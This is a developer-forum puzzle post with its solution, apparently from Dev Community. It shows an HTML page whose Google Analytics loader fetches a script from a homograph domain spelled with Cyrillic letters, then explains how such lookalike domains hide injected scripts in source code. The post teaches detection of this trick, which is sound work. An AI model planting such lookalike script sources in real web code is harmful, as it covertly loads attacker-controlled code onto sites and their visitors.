Spot the malware

Antony Garand - Jul 16 '18 - - Dev Community

Challenge

Help!

My website was recently infected, and I can't seem to get rid of the casino ads it is generating!
All I am serving is this plain html file, could you help me find out what is causing it?

The google analytics part was generated from the Adding analytics.js to Your Site page!

Index.html:

<title>Are you lost ?</title>
<h1>Lost on the internet?</h1>
<h2>Don't panic! I'm here to help</h2>
<strong><pre> * &lt;----- You are here</pre></strong>
<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-аnаlytics.com/analytics.js','ga');

ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
Enter fullscreen mode Exit fullscreen mode

Solution

This may seem like a regular website with Google Analytics attached, but there is a twist!
It may be more obvious when serving the page and inspecting the network tab:
Analytics

Instead of loading the expected google-analytics.com domain, the xn--google-nlytics-1tlb.com domain is loaded.

Why is that you may ask?

Well, the answer is in both a of google-analytics.com: They aren't your good old ascii a, but are actually cyrillic a!

Check it yourself: https://www.google-аnаlytics.com (Note: Domain not registered)

This leads us to a good old homograph attack, where most of us will see the legit google-analytics domain while its punycode equivalent, xn--google-nlytics-1tlb.com, will be loaded.

Punycode and homograph attacks are used a lot in phishing campaigns but most browsers will show the decoded xn-- url.

When reading source code though, IDE's and text editors usually show a regular cyrillic a, which is hard to distinguish with our bare eyes.
This can be leveraged by malware creators by registering hosts similar to popular CDN's and injected scripts, then replacing genuine domain with their own.

This would make it impossible to see when simply looking at the source code, such as with the index.html file, yet would allow them to inject malware on the websites.

Reference

  • Homographs-attack Check out this post's reference if you need more, I can't match its completeness.
Image
FastHTML : dealing with Modals with the help of Hyperscript

fasthtml, hyperscript
Image
Fundamentals of Data Engineering
Image
Hire MERN Stack Developer for Scalable Web Solutions
Image
Expert Assignment Help | Professional Homework Assistance"
Image
Day 21:
Image
Optimizing Freight Costs with TMS & Ai Integration

ai, beginners, productivity, learning
Image
Day 20:
Image
Close Angular Material Dialog Programmatically

angular, angularmaterial, webdev, materialdesign
Image
The Mechanics Behind Online Roulette: What You Need to Know
Image
Automate Docker Image Deployment to AWS ECR Using GitHub Actions[2024]
Image
Array

webdev, javascript, es6, datastructures
Image
How to Use Amazon Product API

aws, beginners, tutorial
Image
Let's understand the difference between CJS & MJS

javascript, node, learning, beginners
Image
Migrating C# to Python with Claude 3.5 Sonnet.

llm, ai, coding, python
Image
How to Build a Solana Smart Contract?

solana, smartcontract, blockchain, business
Image
How Cloud Development Environments Can Improve Software Security

cloud, softwaredevelopment, cybersecurity
Image
Deploying Node-Red on Azure Container Instance
Image
Create Your Own URL Shortener with This Simple Code

webdev, javascript, beginners, tutorial
Image
Penn Ohio Roofing & Siding Group LLC
. . . . . . . . . . . . . . . . . . . .
Terabox Video Player